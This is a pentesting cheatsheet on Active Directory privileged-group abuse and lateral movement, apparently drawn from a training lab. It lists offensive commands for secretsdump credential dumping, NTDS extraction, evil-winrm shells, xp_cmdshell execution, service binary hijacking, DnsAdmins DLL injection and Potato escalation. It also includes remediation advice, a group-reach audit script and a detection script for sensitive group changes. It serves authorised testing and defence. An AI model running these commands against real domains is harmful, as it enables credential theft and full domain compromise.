🛡️ Methodology Checklist
- Check group membership for high-value groups: Domain Admins, Enterprise Admins, Backup Operators
- RDP to DCs/servers if credentials allow
- WinRM/PSRemoting to servers with found credentials
- Check who has local admin on workstations: BloodHound → “Local Admin” edges
- secretsdump for local SAM if admin: impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[TARGET]
- NTDS dump from DC if Domain Admin
- Document all privileged access obtained for report
🎯 Operational Context
Use when: Privileged AD group memberships identified — abuse Backup Operators, Server Operators, Account Operators, or GPO admin rights for escalation.
Think Dumber First: Backup Operators can read any file on a DC via VSS — including NTDS.dit. Server Operators can start/stop services and modify service binaries. Account Operators can add to non-protected groups. Each group has a specific escalation path.
Skip when: Direct DA path available — don’t use indirect privileged group abuse when DA access is one step away.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| Get-NetLocalGroupMember -ComputerName [HOSTNAME] -GroupName "Remote Desktop Users" | PowerView — who has RDP access on a host |
| Get-NetLocalGroupMember -ComputerName [HOSTNAME] -GroupName "Remote Management Users" | PowerView — who has WinRM access on a host |
| evil-winrm -i [TARGET_IP] -u [USER] -p '[PASS]' | WinRM shell from Linux |
| Enter-PSSession -ComputerName [HOSTNAME] -Credential [DOMAIN]\[USER] | WinRM shell from Windows (PSCredential required) |
| mssqlclient.py [DOMAIN]/[USER]@[TARGET_IP] -windows-auth | Connect to MSSQL with Windows auth (Impacket) |
| enable_xp_cmdshell | Enable OS command execution in MSSQL |
| xp_cmdshell whoami /priv | Execute OS command via MSSQL |
🔬 Deep Dive & Workflow
BloodHound Cypher Queries:
```cypher
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2
```
Non-Admin Lateral Movement Vectors
Standard PtH over SMB requires local admin rights. These three vectors let you move laterally without them:
| Vector | BloodHound Edge | Group Controlling Access | Tool |
|---|---|---|---|
| RDP | CanRDP | Remote Desktop Users | xfreerdp, mstsc |
| WinRM / PSRemote | CanPSRemote | Remote Management Users | evil-winrm, Enter-PSSession |
| MSSQL | SQLAdmin | db_owner, sysadmin | mssqlclient.py |
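The three vectors above all hinge on who sits in the Remote Desktop Users and Remote Management Users local groups across the estate. The following is an added audit example, not code from the original page: it reads a constructed CSV export in the shape of PowerView's Get-NetLocalGroupMember output (host names other than ACADEMY-EA-MS01 and users other than forend are made up), rebuilds the CanRDP/CanPSRemote reach map per principal, and flags broad principals (such as Domain Users) and accounts with multi-host reach.

```python
import csv
import io
from collections import defaultdict

# Constructed sample export (not from the original page): one row per member
# of the two non-admin access groups on each host.
SAMPLE_CSV = """ComputerName,GroupName,MemberName
ACADEMY-EA-MS01,Remote Management Users,INLANEFREIGHT\\forend
ACADEMY-EA-MS01,Remote Desktop Users,INLANEFREIGHT\\Domain Users
ACADEMY-EA-WEB01,Remote Management Users,INLANEFREIGHT\\forend
ACADEMY-EA-WEB01,Remote Management Users,INLANEFREIGHT\\svc_web
ACADEMY-EA-DC01,Remote Desktop Users,INLANEFREIGHT\\helpdesk
"""

# Mirrors the page's table: local group -> BloodHound edge name.
EDGE_FOR_GROUP = {
    "Remote Desktop Users": "CanRDP",
    "Remote Management Users": "CanPSRemote",
}
# Principals that turn a single group entry into domain-wide reach.
BROAD_PRINCIPALS = {"Domain Users", "Authenticated Users", "Everyone", "Users"}


def build_reach_map(csv_text):
    """Return {member: {edge: set(hosts)}} for the non-admin access groups."""
    reach = defaultdict(lambda: defaultdict(set))
    for row in csv.DictReader(io.StringIO(csv_text)):
        edge = EDGE_FOR_GROUP.get(row["GroupName"])
        if edge is None:  # other local groups are out of scope here
            continue
        reach[row["MemberName"]][edge].add(row["ComputerName"])
    return reach


def risky_entries(reach, max_hosts=1):
    """Flag broad principals and members reaching more than max_hosts hosts."""
    findings = []
    for member, edges in reach.items():
        short = member.split("\\")[-1]  # strip the DOMAIN\ prefix
        for edge, hosts in edges.items():
            if short in BROAD_PRINCIPALS:
                findings.append((member, edge, sorted(hosts), "broad principal"))
            elif len(hosts) > max_hosts:
                findings.append((member, edge, sorted(hosts), "multi-host reach"))
    return findings


if __name__ == "__main__":
    for member, edge, hosts, why in risky_entries(build_reach_map(SAMPLE_CSV)):
        print(f"{why}: {member} has {edge} to {', '.join(hosts)}")
```

Each finding is a membership to justify or remove; the same data is what BloodHound turns into CanRDP/CanPSRemote edges.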
WinRM Access
```bash
# From Linux
evil-winrm -i 10.129.201.234 -u forend -p Klmcargo2
```
```powershell
# From Windows (build PSCredential first)
$pass = ConvertTo-SecureString 'Klmcargo2' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\forend', $pass)
Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $cred
```
MSSQL Escalation
Credentials found via Kerberoasting or in web.config files frequently authenticate to MSSQL:
```text
mssqlclient.py INLANEFREIGHT/damundsen@172.16.5.150 -windows-auth
# Enable OS execution (mssqlclient.py built-in command)
enable_xp_cmdshell
xp_cmdshell whoami /priv
```
SeImpersonatePrivilege pivot: MSSQL service accounts almost always hold SeImpersonatePrivilege. Once inside via xp_cmdshell, route a Potato exploit (JuicyPotato, PrintSpoofer, RoguePotato) to reach SYSTEM.
Post-Lateral-Movement Loop
Every new host requires immediate re-enumeration:
- Check whoami /priv for SeImpersonatePrivilege, SeDebugPrivilege
- Hunt for credentials in files, registry, browser profiles
- Check running services for unquoted paths / writable binaries
- Enumerate which other hosts this user can reach (local admin check)
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Backup Operators shadow copy fails | Need interactive logon or RDP | Create the shadow copy non-interactively over WinRM (diskshadow.exe or wmic): wmic shadowcopy call create Volume='C:\' |
| Server Operators service modification fails | Service already running or protected | Stop service first: sc stop [SVC]; then modify binary path |
| Account Operators can’t add to Domain Admins | AdminSDHolder protection | Account Operators cannot modify adminCount=1 groups; target non-protected groups instead |
| GPO modification requires SYSVOL write | Permissions blocked | Confirm: nxc smb [DC] -u [USER] -p [PASS] --shares shows SYSVOL with WRITE |
| DnsAdmins DLL injection requires DNS restart | DNS service restart needed | sc stop DNS && sc start DNS requires Server Operator or DNS Admin rights |
📝 Reporting Trigger
Finding Title: Privileged AD Group Membership Enables Domain Escalation
Impact: Membership in Backup Operators, Server Operators, or DnsAdmins groups provides indirect paths to Domain Admin equivalent access through VSS access to NTDS.dit, service binary modification, or DNS DLL injection.
Root Cause: Users granted privileged group membership beyond operational requirements. Privileged groups not included in Tier 0 administration model review.
Recommendation: Audit all privileged group memberships and remove unnecessary access. Treat Backup Operators, Server Operators, Account Operators, and DnsAdmins as Tier 0 sensitive groups. Implement JIT access for privileged groups. Alert on sensitive group membership changes.
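The recommendation to alert on sensitive group membership changes maps onto three Windows Security events: 4728 (member added to a global group), 4732 (domain local/local group) and 4756 (universal group). The following detection is an added example, not code from the original page; it runs over constructed event records (all user and group values other than the Tier 0 group names taken from this page are made up) and raises an alert only for additions, not removals, to the groups this page treats as Tier 0 sensitive.

```python
import json

# Windows Security "member added to security-enabled group" events, keyed by
# group scope. The matching removal events (4729/4733/4757) are ignored.
MEMBER_ADDED_EVENTS = {4728: "global", 4732: "domain local", 4756: "universal"}

# Groups this page treats as Tier 0 sensitive plus the DA/EA targets from the
# methodology checklist; compared case-insensitively.
SENSITIVE_GROUPS = {
    "domain admins", "enterprise admins", "backup operators",
    "server operators", "account operators", "dnsadmins",
}

# Constructed sample records (not from the original page), shaped like the
# EventData fields a SIEM forwards for these event IDs.
SAMPLE_EVENTS = [
    {"EventID": 4732, "TargetUserName": "Backup Operators",
     "MemberName": "CN=forend,CN=Users,DC=INLANEFREIGHT,DC=LOCAL",
     "SubjectUserName": "helpdesk1"},
    {"EventID": 4728, "TargetUserName": "Marketing",
     "MemberName": "CN=jdoe,CN=Users,DC=INLANEFREIGHT,DC=LOCAL",
     "SubjectUserName": "helpdesk1"},
    {"EventID": 4733, "TargetUserName": "Backup Operators",  # removal, not an add
     "MemberName": "CN=svc_old,CN=Users,DC=INLANEFREIGHT,DC=LOCAL",
     "SubjectUserName": "admin1"},
    {"EventID": 4756, "TargetUserName": "Enterprise Admins",
     "MemberName": "CN=svc_web,CN=Users,DC=INLANEFREIGHT,DC=LOCAL",
     "SubjectUserName": "admin2"},
]


def sensitive_group_additions(events):
    """Return one alert per member-added event whose target group is Tier 0 sensitive."""
    alerts = []
    for ev in events:
        scope = MEMBER_ADDED_EVENTS.get(ev.get("EventID"))
        if scope is None:
            continue  # removals and unrelated event IDs
        group = ev.get("TargetUserName", "")
        if group.lower() not in SENSITIVE_GROUPS:
            continue
        alerts.append({"group": group, "scope": scope,
                       "member_dn": ev.get("MemberName", ""),
                       "by": ev.get("SubjectUserName", "")})
    return alerts


if __name__ == "__main__":
    for alert in sensitive_group_additions(SAMPLE_EVENTS):
        print(json.dumps(alert))
```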